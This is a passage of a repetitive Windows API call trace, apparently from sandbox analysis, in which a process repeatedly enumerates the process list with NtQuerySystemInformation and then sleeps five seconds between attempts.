BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.071] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.088] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.119] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.133] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.152] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.166] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.187] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.198] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.212] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.227] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.243] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.259] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.274] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.293] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.305] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.321] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.337] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.353] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.371] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.383] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.400] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 